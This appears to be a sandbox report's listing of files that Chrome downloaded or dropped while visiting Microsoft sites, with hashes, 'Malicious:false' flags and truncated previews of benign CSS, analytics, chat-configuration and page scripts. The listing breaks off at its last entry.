                                                                                                                                    Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (21576), with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):21576
                                                                                                                                    Entropy (8bit):4.929076929051309
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:6DCB463D46446CFDFD13AA8709079DA2
                                                                                                                                    SHA1:20AC824FBFB1C34F18F541D2FA2CF7157127024D
                                                                                                                                    SHA-256:31CBB9A4B8A874A5D6DF6F3F64D625F6A5F6690D69622250B2E64035E0087711
                                                                                                                                    SHA-512:7EBE93CDADEB2E9CDA6AD3DAC7B3558BBC6D94B36919A83EFF9315AD66954D9CDB33FFD6E706B4149C4360865E5C7CDC9B5B407EF56ED3F91FD3EF3F51B6BE23
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://accdn.lpsnmedia.net/api/account/60270350/configuration/le-campaigns/zones?fields=id&fields=zoneValue&cb=lpZonesStaticCB
                                                                                                                                    Preview:lpZonesStaticCB([{"id":138781714,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Right Overlay","deleted":false,"zoneType":1,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":27},{"engagementSubType":18},{"engagementSubType":22},{"engagementSubType":17},{"engagementSubType":26},{"engagementSubType":24},{"engagementSubType":19}],"isDeleted":false},{"id":138781814,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Offsite","deleted":false,"zoneType":2,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":28},{"engagementSubType":30},{"engagementSubType":29}],"isDeleted":false},{"id":138781914,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Left Overlay","deleted":false,"zoneType":1,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":15},{"engagementSubType":14},{"engagementSubType":23},{"engagementSubType":21},{"engagementSubType":20},{"engagementSubType":16},{"engag
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):308
                                                                                                                                    Entropy (8bit):4.70981696594715
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:D54C23BA76BD8648119795790AE83779
                                                                                                                                    SHA1:D8D52ACAEB44EF8D5ED93D3EB65465AEFC8E8EA7
                                                                                                                                    SHA-256:50F43ABADD35CC811C5C927FA149DD93E18707562D9961D82208B3261E2C1A34
                                                                                                                                    SHA-512:1844CD63F89AA92C33D9D7E691B1F8DFB55F3195E86FB359719E6E81E82A98C5BBE3889D33C37499768F51DF5A48BF0633254F64E3257572566D444CCFC26FF9
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/core/wcm/components/tabs/v1/tabs/clientlibs/site.min.ACSHASHd54c23ba76bd8648119795790ae83779.css
                                                                                                                                    Preview:.cmp-tabs__tablist{display:flex;flex-wrap:wrap;padding-left:0;list-style:none}..cmp-tabs__tab{box-sizing:border-box;border-bottom:1px solid transparent;padding:.5rem 1rem;cursor:pointer}..cmp-tabs__tab--active{border-color:inherit}..cmp-tabs__tabpanel{display:none}..cmp-tabs__tabpanel--active{display:block}
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (59832)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):99505
                                                                                                                                    Entropy (8bit):5.20600737523251
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:895E2A12062F1EE44D7D72D266904BDE
                                                                                                                                    SHA1:896B8B40961C524472FB84C4760160267A3B89A6
                                                                                                                                    SHA-256:D2AEA4BA12C00A853C03EB8EA9575338D1A21D15314B39B9A7AA039016E6FC93
                                                                                                                                    SHA-512:5673B54ECFF13BB7263EA98A554B8DEB04C5C2151B164F0A3A1411D9BB624C0395147D618C7C3381F263EAF5EECAA0E7EDC479DB9ABDC1A611110C2DC4610D2A
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/structure/page/clientlibs/experimentation.min.ACSHASH895e2a12062f1ee44d7d72d266904bde.js
                                                                                                                                    Preview:// ***************************************.// config file for at.js lib.//****************************************************************************.// SET TARGET PROPERTY HERE:.const at_property = window.cas.exp.target.propertyToken; // Workspace Name.// ***************************************************************************.! function () {. window.tt_getCookie = function (t) {. var e = RegExp(t + "[^;]+").exec(document.cookie);. return decodeURIComponent(e ? e.toString().replace(/^[^=]+./, "") : ""). }. var t = tt_getCookie("MC1"),. e = tt_getCookie("MSFPC");. function o(t) {. return t.split("=")[1].slice(0, 32). }. var n = "";. if ("" != t) n = o(t);. else if ("" != e) n = o(e);. if (n.length > 0) var r = n;. if (n.length > 0 && at_property != "") {. window.targetPageParams = function () {. return {. "mbox3rdPartyId": r,. "at_property": at_property,. ...(win
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):681
                                                                                                                                    Entropy (8bit):5.043291133932798
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:104138E7B8F89DBF7CC66485544A0669
                                                                                                                                    SHA1:7C3F43BDA4BAF55F893876DC62B55800E194F135
                                                                                                                                    SHA-256:FCA9EEC67C99F083AF9AA30169AF20B7DE12949D45A48FACC70B061F1F0FCBE0
                                                                                                                                    SHA-512:7BE127AE63F31606BFC909476F8ACF4857726E6C5A7CCCE06FF6EB713CFA328DB58B2FBDBBB298D59030CED8853AEE4771D865DCAA487871E6F71E79CE687F98
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/Ai-icon-dark
                                                                                                                                    Preview:<svg width="43" height="32" viewBox="0 0 43 32" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_14400_15452)">.<path d="M0 14.9335C0 6.68606 6.65493 0.000183105 14.8642 0.000183105H28.1358C36.3451 0.000183105 43 6.68607 43 14.9335V17.0669C43 25.3143 36.3451 32.0002 28.1358 32.0002H0V14.9335Z" fill="#004275"/>.<ellipse cx="12.6195" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.<ellipse cx="21.0326" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.<ellipse cx="29.4457" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.</g>.<defs>.<clipPath id="clip0_14400_15452">.<rect width="43" height="32" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):22990
                                                                                                                                    Entropy (8bit):7.982983139896656
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:8309120C855706539E3C1024E582657E
                                                                                                                                    SHA1:EFE69829E6F2CEAC0AE7FE5AD65BB9FB251BCCAD
                                                                                                                                    SHA-256:C43A927278957616FFB9A741AA6412777AE8F4AA1B0415246EF2B1594DE4A142
                                                                                                                                    SHA-512:0A03E2578B55B39EE10EE63A3A27F170CFD985A8FDE3337B26E2F13894D09E9A24A2536827B3A66FBC31B8431034FAA9F7DCC9CE9F984A4F5A6C891A37E260E1
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/cta-stacked-1600x1080?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&hei=1080&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............h..Wf.................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......@...8....pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma........................X!mdat.....*..7.P2.....$@..R.~...cL.0,.A.'y.PV....H.(..B..VL..[.W)m/=8.]...w......&H.{.."..yyxt._:z..).v+(Rk.W.u.....=u.0....HK.q.";J.RZ...Vf.....a.&...V...&G.....F.Y6....v.........*..7....B2..D........S...D.B.+.3nY.xH.:.....w>...?.V.....<,.3....&Xx..<@....R;.`AF....../.;...O..QC0-y5......!...6f.`.....\n.F.....N..V.X\.,........O.....i.B...y....!...z..n.....O..$.......W?..]9..+X.....<.:...g.[..x<z.`H+{.w......f..P..3o...!".5z}.$.=..6.i.2.$H.+.m...n,..C...%...........F.....-s...T..F*s......7g.g..zhM... ...J)#....s.......S....q.z..@..d.\..
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):9849
                                                                                                                                    Entropy (8bit):4.327507698755054
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:08C5F9CB4220E78FF920DAE3A7A8ED53
                                                                                                                                    SHA1:06063CC0DE00B0F698B07DEB66DDEDE5C60940E7
                                                                                                                                    SHA-256:E8B12100E50470AE78CA039D5662394A89E01C61FE8D4682DFE606E906E677ED
                                                                                                                                    SHA-512:0E7ED8C068FA14123041314F58C1473DF3EB60C3B6CE1A95B1A7066C1B151D5D7EC6F2D585B2862721DB164B9CE79E61DFB6FB0A53951504BB2235739B4C35F6
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/reimagine/clientlib-reimagine-base.min.ACSHASH08c5f9cb4220e78ff920dae3a7a8ed53.js
                                                                                                                                    Preview:(function() {. "use strict";.. var $uhfSkipToMain = $("#uhfSkipToMain");. var $acomHeaderSkipToMain = $(".azure-skip-nav");. var href = "";. if($uhfSkipToMain.length) {. href = $uhfSkipToMain.data("href");. href = href && href.replace("#", "") || "mainContent";. } else if($acomHeaderSkipToMain.length) {. href = $acomHeaderSkipToMain[0].getAttribute("href");. href = href && href.replace("#", "") || "main";. }.. $('.microsoft-template-layout-container').attr("id", href);.})();.// This function replaces popover data-island tags insertd in RTE via the popover plugin.(function () {. if (!window || !window.ocrReimagine) {. return;. }.. window.ocrReimagine.PopoverRichTextPlugin = new class {. popoverRichTextMountSelector = '.popover-rte-mount';. popoverMountSelector = '[data-mount="popover"]';.. isPopoverComponentEnabled() {. return !!(window.mwf?.Popover);. }.. isIconComponentEna
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (46591)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):142367
                                                                                                                                    Entropy (8bit):5.430597817875451
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:CCAA31FD031C4C856EB7B986FD9F447B
                                                                                                                                    SHA1:0A809EABCDB95FA04DE5F8409B3BC994ED65CBD1
                                                                                                                                    SHA-256:3D40B4129B8B4C284908636AE46D72EA053F286FB5FE45DB78351B5B2CFC1EB9
                                                                                                                                    SHA-512:4B5B2271DB5F640FEBF13A7C0BDBD630C73530000F1593046D090585D1752E239D894614E23E801BE4C6A379406B6EF521423FA27C3865C3CD4ABB0A64823780
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://aadcdn.msftauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                                                                                    Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (2508), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2508
                                                                                                                                    Entropy (8bit):5.581228471127567
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:F88665C80987A03F9FFA51D835E021DD
                                                                                                                                    SHA1:B98092D614186160765398901DE37E506A71E2E5
                                                                                                                                    SHA-256:510D8CB5CF5C36767295FDD87C54118DBAE8E6B406BEBBA7789B68B00D25BF87
                                                                                                                                    SHA-512:E57E96BA265813730C6A9721C6B135A64AC3CB049E9D86EC9D90DBD15B5954B665B2F2690C2186746DF611EB43DA2D2B10AA23D258CE499AE74955B369344CFC
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:lp4273297438({"onsiteLocations":[4273302638],"followMeTime":0,"connectorId":1644210230,"renderingType":1,"channel":1,"allowUnauthMsg":true,"windowConf":{"json":{"externalConfiguration":null},"type":"internal"},"description":"","language":"en-US","source":0,"type":5,"enabled":true,"skillName":"BOT-POWER-GREETER-EN-US","isUnifiedWindow":true,"id":4273297438,"isPopOut":false,"timeInQueue":0,"visitorBehaviors":[138786914],"followMePages":1,"availabilityPolicyForMessaging":1,"campaignId":"4273296838","zones":[1832737930],"windowId":1832741830,"conversationType":1,"skillId":4273314838,"useSystemRouting":false,"effects":{"useLightBox":false,"secondsToCollapseAfter":0},"createdDate":"2023-10-31 15:31:55","connector":{"deleted":false,"configuration":{"acrValues":["0"],"pkceEnabled":false,"clientId":"60270350","jsMethodName":"lpTag.taglets.unAuthMessaging.lpUnauthFunction","jsContext":"lpTag.taglets.unAuthMessaging","jwtPublicKey":"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvGQctwBFFZBaSu+LC4LV
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (25442), with CRLF line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):25906
                                                                                                                                    Entropy (8bit):5.732423932311874
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:C33129670B3D93859E3510F91EDACDDD
                                                                                                                                    SHA1:F8EDDC80AB322FC4E5D70B7888A345562BE71262
                                                                                                                                    SHA-256:FADB60D43982E382EA9E4C1901A05A357E3EC3D46ED194D346688DBE5642CE63
                                                                                                                                    SHA-512:58F4D12DF7498897B1B94148D55526F9114AA91339A9C555AF9AAA264B1A2179E904C49CD3AB5909C112B5F3C0521249A40E178BC3189F1DB12E50A171867FDB
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://fpt.microsoft.com/tags?session_id=d3b95e04-b5cb-465e-9347-25773be09c41
                                                                                                                                    Preview:<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <title></title>.. <script>var localTarget='https://fpt.microsoft.com/',target='https://fpt2.microsoft.com/Clear.HTML?ctx=Ls1.0&wl=False&',txnId='d3b95e04-b5cb-465e-9347-25773be09c41',ticks='8DD1EB7EEAF1290',rid='87b13f09-d816-4cfa-90cc-67a80d978979',authKey='H3ihr9e92IdW6yd1ZgQ9S5rgl8oOzJXlGHKxtZ4bVKpvq6%252fATrRNPOzEVmuod%252bCuv8DX06rzw%252b14Ud0hu7ryh3aMG4OJWG%252fMvYoEFk8plxOb%252fgSaPwaTx0SSn93jDLMov5x7k5NxZ6fqXZQDvy9m23gbi13ElaVZIJoVs3naFWtnR%252fZw98b28%252fipilAmExdEKT9jSduAgY7IvOGsLVqcTqOzWE%252fIykY%252b7PyZeX00flfxSuxAcgVeEYr01GRuqTDjkVZgTZWwH189ExDWJto15CrVkl4GFmKt10ztyCuDTbhx9ZFnkxJpwm%252bB2tqKJAvL',cid='02C58649-E822-405B-B6C3-17A7509D2FCC',assessment='',waitresponse=false,bbwait=false,commonquery='',lsInfo=true,splitFonts=false,noFonts=false,UCH=true,PTO=100,rticks=1734452948877,cmenl=false,ipv6Url='',txnKey='session_id',ridKey='id',lskey='MUID';var timingMetrics={},clientStart=Date.now(),mdtSt
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):171505
                                                                                                                                    Entropy (8bit):5.043804815226508
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:8F186BBA557DC6140841C682AF4D60EE
                                                                                                                                    SHA1:CE2F96E57EE3D9ED15B8A2DD3EBDC7E54439AF98
                                                                                                                                    SHA-256:CDA4813A965CCD1AAA50550D08B928AAF4C7F50B6F77823213FE3A97E806C2F1
                                                                                                                                    SHA-512:17ACC430C28A171C1FD029C1B0EB67BE14ED41ED9F7F10E4040ABA1FA39B8DA5CAC7CDF979BAB6CAFAD126AA94C88D123F170E78C51745C3833AE80AD23FB36A
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/52-918540/ca-ae3ce4?ver=2.0&_cf=02242021_3231
                                                                                                                                    Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (691)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):838
                                                                                                                                    Entropy (8bit):5.42939965530019
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:93B7C316FC2BBD2C83130D26CBB1A89A
                                                                                                                                    SHA1:D2BA90EE9CFBB4D7639C69AB4D02C6C8DC8B3668
                                                                                                                                    SHA-256:0CF1783126934B10707088830AFC71E103609D6E7D332356A74BDB44C2C42843
                                                                                                                                    SHA-512:3C0046841C75AFDC8DE823563F6264496B389F147C0ACBD15842B81A5E7E2733947ECBB5F88EFCEBF4A16CD7C74CA82E7429E90084F70230C20B682BE79194A8
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RC1c94de512bb2445e83703950b946654d-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RC1c94de512bb2445e83703950b946654d-source.min.js', "function areNonEssentialCookiesAllowed(){function e(){Munchkin.init(\"157-GQE-382\",o)}console.log(\"munchkin starts\");var n=document.createElement(\"script\");n.src=\"https://munchkin.marketo.net/157/munchkin.js\",document.head.appendChild(n);var o={cookieAnon:!1,cookieLifeDays:365};console.log(\"munchkin end\"),setTimeout((function(){e()}),3e3)}var ruleCorrelationGuid=\"KIF-160e3ca9-547d-468d-b59b-76710f887a7c\";console.log(ruleCorrelationGuid+\": Launcher Rule Fired\"),setTimeout((function(){areNonEssentialCookiesAllowed()}),3e3);");
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (12824)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):58060
                                                                                                                                    Entropy (8bit):5.596324920359172
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:1986FCF12655BE6003E39A655BEB6F0F
                                                                                                                                    SHA1:0C90899E47927E6D63E445B6BFE9C986E8621830
                                                                                                                                    SHA-256:F66185BEC9D95EC9E4C49D1B38F433AB51AEF9853B21B5D3C0DA54F3987EAF0C
                                                                                                                                    SHA-512:FAD912AC31C6297A4D4EAA4FC263C5EF8ECA0281D79213B64CE606BBC124B0BFD7F1CADF47C34560406AC804EEF87922E25F7D054B3C539F3AE95D30C8EE7FAB
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/msonecloudapi/assets/msochead.js
                                                                                                                                    Preview:/*! Static Override Utilities */.(()=>{window.SOUtil=window.SOUtil||{addStylesheet:(cssStyles,overrideId)=>{const style=document.createElement("style");if(overrideId){style.id="static-override-"+overrideId}style.appendChild(document.createTextNode(cssStyles));document.head.appendChild(style)},pageIsInScope:pageScope=>{const host=location.hostname;const path=location.pathname;const locale=document.documentElement.lang.toLowerCase();const getMarket=marketAware=>{const locale=document.documentElement.lang.toLowerCase();const langCode=locale.split("-")[0];const market=new URLSearchParams(location.search).get("market")?.toLowerCase();if(market&&marketAware!==false){return`${langCode}-${market}`}return locale};const langLocs={"sr-rs":["sr-rs","sr-latn-rs","sr-cyrl-rs"],default:[locale]};const possibleLangLocs=langLocs[locale]||langLocs.default;const pathLocale=possibleLangLocs.find(loc=>path.indexOf(loc)!==-1);const pathNoLocale=path.replace(`/${pathLocale}`,"").replace(/\/$/,"");const previ
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (576)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):59868
                                                                                                                                    Entropy (8bit):5.549823852454853
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:30368A72D017E4133BFD3B5D073D06FF
                                                                                                                                    SHA1:7BD9259C475D46707628108E5A1C33DDAEE43BF3
                                                                                                                                    SHA-256:ED425C2855B7269156A549BFA9C2594882C8813B1FB3CB52D067D5A9B5471E96
                                                                                                                                    SHA-512:0A3E298D69906024DC0FB5854F3E57816A81506E513A1823127F4AC7A943A0D942AD8F3D41EB5EC0DB4D2AD8ABE1F39A0B6CDB024C4F547733B9922F676A9BB3
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/structure/page/clientlibs/visitor.min.ACSHASH30368a72d017e4133bfd3b5d073d06ff.js
                                                                                                                                    Preview:/*.. Adobe Visitor API for JavaScript version: 4.4.0. Copyright 2019 Adobe, Inc. All Rights Reserved. More info available at https://marketing.adobe.com/resources/help/en_US/mcvid/.*/.'use strict';var e=function(){function N(d){return(N="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(f){return typeof f}:function(f){return f&&"function"==typeof Symbol&&f.constructor===Symbol&&f!==Symbol.prototype?"symbol":typeof f})(d)}function O(d,f,g){return f in d?Object.defineProperty(d,f,{value:g,enumerable:!0,configurable:!0,writable:!0}):d[f]=g,d}function P(d,f,g){d=null==d?void 0:d[f];return void 0===d?g:d}function R(d,f){if(d===f)return 0;d=d.toString().split(".");.f=f.toString().split(".");a:{var g=d.concat(f);for(var c=/^\d+$/,k=0,m=g.length;k<m;k++)if(!c.test(g[k])){g=!1;break a}g=!0}if(g){for(;d.length<f.length;)d.push("0");for(;f.length<d.length;)f.push("0");a:{for(g=0;g<d.length;g++){c=parseInt(d[g],10);k=parseInt(f[g],10);if(c>k){d=1;break a}if(k>c){d=-1;break a}}d=0
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:C++ source, ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):13110
                                                                                                                                    Entropy (8bit):4.53925643908527
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:42FFFAB3ACD04EA132F8C11D5E26059F
                                                                                                                                    SHA1:66A844D51A5ED1A66DDB733216A7A2EB25A5729F
                                                                                                                                    SHA-256:2F495FCAD3C118DBB2E28E094960E942974B43BDA1A9F1243CBA290DADFF0D1D
                                                                                                                                    SHA-512:10A8A51FC663D18FBB7AE39B01DB347CF383EE60A2FB5F758589C06BBD2FAD7A9C2B0E5C54639AC1EDA35426A646458E74F46944C1551E43AA6FCD6B4640DC3C
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:(() => {. /** Create ocrReimagine namespace */. if (!window.ocrReimagine) {. window.ocrReimagine = {};. }.. /** Create Market Selector module namespace */. if (!window.ocrReimagine.MarketSelector) {. window.ocrReimagine.MarketSelector = {};. }.. const cookieExpiryDays = 30;. const cookieKey = 'PMGSKUMarketCk';. /** @type {MarketSelector[]} */. const instances = [];. const queryParamKey = 'market';.. /**. * CSS selector.. * @enum {string}. */. const Selector = {. AFFECTED: '[data-oc-market-selector]',. DATA_MOUNT: '[data-mount="market-selector"]',. FW_LINKS: '[data-regenerate-fwlink="true"]',. SELECT_MENU: '.custom-select-input'. };.. /**. * JS event name.. * @enum {string}. */. const EventName = {. ON_INIT: 'onInit',. ON_REFRESHED: 'onRefreshed',. ON_REMOVE: 'onRemove',. ON_SELECT: 'onSelect',. ON_UPDATE: 'onUpdate'. };.. /**. *
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (32746)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):244307
                                                                                                                                    Entropy (8bit):5.512101778304857
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:1BEB04BD830779DC9C524916BA545DFF
                                                                                                                                    SHA1:DD3BE2A0E1E968D71F15BFCE73E2ADA8697B6DC5
                                                                                                                                    SHA-256:B5983811F83774E632E63BA4015984A01BD77EA87AC441BABD2AF2472A5680AE
                                                                                                                                    SHA-512:4B6B2ECB8BC17D104F8106EB19D0FB2E53AE3D1A1F8CB97664E14FB1F66558D82511FB7AD190F846D0B9D7CA6037F556C66A31F6B8C1209F7DA5014918AC79A6
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/launch-ENc0cbffaf0f8248c3a934a56818d7737e.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-12-16T08:09:15Z",turbineBuildDate:"2024-08-22T17:32:44Z",turbineVersion:"28.0.0"},environment:{id:"ENc0cbffaf0f8248c3a934a56818d7737e",stage:"production"},dataElements:{MC1_DE:{defaultValue:"",modulePath:"core/src/lib/dataElements/cookie.js",settings:{name:"MC1"}},purl:{defaultValue:"",cleanText:!0,storageDuration:"pageview",modulePath:"core/src/lib/dataElements/pageInfo.js",settings:{attribute:"url"}},cachebuster:{defaultValue:"",cleanText:!0,storageDuration:"pageview",modulePath:"core/src/lib/dataElements/randomNumber.js",settings:{max:1e6,min:1}}},extensions:{clicktale:{displayName:"Clicktale Tag Injector",hostedLibFilesBaseUrl:"https://assets.adobedtm.com/extensions/EP4d83bfe125da46f2b5b2fcacec043b9f/",settings:{guid:"76a3450f-9b77-4456-a451-720ddc99b4c8",partition:"www
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):175
                                                                                                                                    Entropy (8bit):4.68043398329258
